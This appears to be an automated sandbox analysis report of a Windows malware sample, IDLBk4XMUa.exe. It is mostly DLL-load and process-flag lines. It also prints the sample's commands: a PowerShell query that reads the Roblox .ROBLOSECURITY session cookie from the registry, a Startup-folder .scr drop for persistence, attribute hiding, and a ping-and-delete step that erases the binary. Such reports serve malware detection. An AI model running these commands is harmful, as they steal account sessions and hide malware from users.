                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: IDLBk4XMUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: IDLBk4XMUa.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: IDLBk4XMUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation

                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: IDLBk4XMUa.exe    Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    Code function: 0_2_00007FFAACCF815D push ebx; ret    0_2_00007FFAACCF816A
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    Code function: 0_2_00007FFAACCE00BD pushad ; iretd    0_2_00007FFAACCE00C1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    Code function: 0_2_00007FFAACEB5CE2 push ecx; retn 5F2Eh    0_2_00007FFAACEB62DC
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    Code function: 0_2_00007FFAACEB8167 push ebx; ret    0_2_00007FFAACEB816A
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    Code function: 0_2_00007FFAACEB4D49 pushad ; ret    0_2_00007FFAACEB4D59
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Code function: 14_2_00007FFAACB8D2A5 pushad ; iretd    14_2_00007FFAACB8D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Code function: 14_2_00007FFAACD72316 push 8B485F95h; iretd    14_2_00007FFAACD7231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Code function: 18_2_00007FFAACCD109C push E85DB1FBh; ret    18_2_00007FFAACCD10F9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Code function: 23_2_00007FFAACCE08BD push E958F41Ch; ret    23_2_00007FFAACCE0909
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Code function: 23_2_00007FFAACCE0875 push E95DB13Ch; ret    23_2_00007FFAACCE0899
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Code function: 31_2_00007FFAACCD23DA pushad ; retf    31_2_00007FFAACCD23E1

                        Persistence and Installation Behavior

                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe"

                        Boot Survival

                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scr
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr\:Zone.Identifier:$DATA

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    Process created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pause
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe    Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
